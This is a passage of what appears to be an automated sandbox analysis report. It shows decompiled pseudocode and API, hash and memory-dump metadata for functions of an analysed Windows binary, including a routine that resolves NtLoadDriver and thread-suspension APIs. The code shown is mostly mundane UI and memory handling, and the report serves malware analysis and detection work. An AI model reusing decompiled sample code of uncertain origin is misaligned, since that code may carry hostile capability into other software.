0x00404801
0x00404802
0x0040480d
0x00404812
0x00404813
0x00404834

APIs

GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
_snwprintf.MSVCRT ref: 00404813
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C

Strings

Error %d: %s, xrefs: 00404802
Error, xrefs: 0040481D

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C

Uniqueness

Uniqueness Score: -1.00%

Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}

0x004068ec
0x004068f0
0x004068f4
0x004068ff
0x00406902
0x0040690a
0x00406910
0x00406911
0x0040691b
0x0040691e
0x00406923
0x0040692d
0x0040692e
0x00406933
0x0040693d
0x00406940
0x00406949
0x0040694a
0x00406950
0x00406956
0x00406959
0x0040695c
0x00406964
0x0040696d
0x00406974
0x0040697e
0x00406989
0x00406990
0x00406998
0x0040699b
0x0040699f
0x004069b8
0x004069bc
0x004069c4
0x004069c7
0x004069c7
0x004069cb
0x004069ce
0x004069d4
0x004069d4
0x004069d9
0x004069df
0x004069e6
0x004069ea
0x004069ef
0x004069f2
0x004069f5
0x00406a00
0x00406a01
0x00406a06
0x00406a08
0x00406a0b
0x00406a10
0x00406a16
0x00406a25
0x00406a25
0x00406a18
0x00406a1e
0x00406a1e
0x00406a27
0x00406a2f
0x00406a32
0x00406a35
0x00406a3b
0x00406a41
0x00406a47
0x00406a4d
0x00406a53
0x00406a5d
0x00406a6d

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??2@YAPAXI@Z.MSVCRT ref: 0040692E
??2@YAPAXI@Z.MSVCRT ref: 0040694A
memcpy.MSVCRT ref: 0040696D
memcpy.MSVCRT ref: 0040697E
??2@YAPAXI@Z.MSVCRT ref: 00406A01
??2@YAPAXI@Z.MSVCRT ref: 00406A0B

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID:
API String ID: 975042529-0
Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8

Uniqueness

Uniqueness Score: -1.00%

Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

0x004097b1
0x004097b9
0x004097bb
0x004097be
0x004097c3
0x004097ca
0x004097de
0x004097de
0x004097e3
0x004097e5
0x004097e5
0x004097ec
0x004097f3
0x004097f6
0x004097fe
0x00409802
0x00409805
0x0040980a
0x0040980d
0x00409810
0x00409822
0x00000000
0x00409827
0x0040982a
0x004098da
0x004098da
0x004098dc
0x004098e0
0x004098e9
0x004098ec
0x004098f6
0x004098f6
0x004098e2
0x00000000
0x004098e2
0x00409830
0x00409833
0x00409838
0x0040983b
0x0040983e
0x0040985f
0x0040985f
0x00409861
0x00409863
0x0040989e
0x004098b1
0x004098b8
0x004098c0
0x004098c5
0x004098d5
0x00409865
0x00409865
0x00409865
0x0040986c
0x00409878
0x0040987f
0x0040988a
0x0040988f
0x0040988f
0x0040986c
0x00000000
0x00409863
0x00409840
0x00409843
0x00409846
0x0040984b
0x00409852
0x00000000
0x00000000
0x00409854
0x0040985d
0x00000000
0x00000000
0x00000000
0x0040985d
0x00409894
0x00000000
0x00409894

APIs

Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

??2@YAPAXI@Z.MSVCRT ref: 004097F6
memset.MSVCRT ref: 00409805
memcpy.MSVCRT ref: 0040988A
memcpy.MSVCRT ref: 004098C0
??3@YAXPAX@Z.MSVCRT ref: 004098EC

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$memcpy$??2@??3@HandleModulememset
String ID:
API String ID: 3641025914-0
Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}

0x004067ac
0x004067af
0x004067b5
0x004067ba
0x004067bf
0x004067c1
0x004067c6
0x004067c7
0x004067cc
0x004067cd
0x004067d2
0x004067d4
0x004067d9
0x004067da
0x004067df
0x004067e0
0x004067e5
0x004067e7
0x004067ec
0x004067ed
0x004067f2
0x004067f3
0x004067f8
0x004067fa
0x004067ff
0x00406800
0x00406805
0x00406806
0x00406808
0x0040680f
0x00406810
0x00406812
0x00406817
0x0040681e
0x00406828
0x0040682b
0x0040682c
0x0040681e
0x00406835
0x00406839
0x00406841

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??3@YAXPAX@Z.MSVCRT ref: 004067C7
??3@YAXPAX@Z.MSVCRT ref: 004067DA
??3@YAXPAX@Z.MSVCRT ref: 004067ED
??3@YAXPAX@Z.MSVCRT ref: 00406800
free.MSVCRT(00000000), ref: 00406839

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED

Uniqueness

Uniqueness Score: -1.00%

Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}

0x00405d03
0x00405d06
0x00405d10
0x00405d17
0x00405d22
0x00405d32
0x00405d40
0x00405d48
0x00405d4e
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00405d67

APIs

GetParent.USER32(?), ref: 00405D0A
GetWindowRect.USER32 ref: 00405D17
GetClientRect.USER32 ref: 00405D22
MapWindowPoints.USER32 ref: 00405D32
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}

0x004083dc
0x004083e2
0x004083e9
0x004083ea
0x004083eb
0x004083f3
0x004083f6
0x004083f8
0x00408401
0x00408404
0x00408407
0x00408409
0x0040840c
0x00408413
0x0040841d
0x00408427
0x0040842c
0x0040842f
0x00408432
0x00408435
0x00408438
0x00408439
0x0040843e
0x0040843f
0x00408442
0x0040844a

APIs

??2@YAPAXI@Z.MSVCRT ref: 004083EB
memcpy.MSVCRT ref: 00408413
memcpy.MSVCRT ref: 0040841D
memcpy.MSVCRT ref: 00408427
??3@YAXPAX@Z.MSVCRT ref: 00408442

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}

0x00406746
0x00406746
0x0040674f
0x00406751
0x00406752
0x00406757
0x00406758
0x0040675d
0x0040675f
0x00406760
0x00406765
0x00406766
0x0040676e
0x00406770
0x00406771
0x00406776
0x00406777
0x0040677f
0x00406781
0x00406785
0x00406787
0x00406788
0x0040678e
0x0040678e
0x00406790
0x00406791
0x00406796
0x00406798
0x0040679e
0x004067a1
0x004067a4
0x004067ab

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406752
??3@YAXPAX@Z.MSVCRT ref: 00406760
??3@YAXPAX@Z.MSVCRT ref: 00406771
??3@YAXPAX@Z.MSVCRT ref: 00406788
??3@YAXPAX@Z.MSVCRT ref: 00406791

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}

0x0040aba8
0x0040aba9
0x0040abb0
0x0040abb2
0x0040abb5
0x0040ac19
0x0040ac2c
0x0040ac2e
0x0040ac36
0x0040ac39
0x0040ac39
0x0040ac1b
0x0040ac21
0x0040ac21
0x0040abb7
0x0040abcb
0x0040abce
0x0040abd7
0x0040abe6
0x0040abf6
0x0040abfe
0x0040ac09
0x0040ac0f
0x0040ac12
0x0040ac4f

APIs

BeginDeferWindowPos.USER32 ref: 0040ABBA

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

EndDeferWindowPos.USER32(?), ref: 0040ABFE
InvalidateRect.USER32(?,?,00000001), ref: 0040AC09

Strings

$, xrefs: 0040AC28

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}

0x00403a7d
0x00403a8c
0x00403a9c
0x00403aba
0x00403adf
0x00403ae7
0x00403af4
0x00403af4
0x00403ae7
0x00403aba
0x00403a9c
0x00403b13

APIs

GetKeyState.USER32(000000A2), ref: 00403A8C

Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C

Strings

A, xrefs: 00403A7F

Memory Dump Source

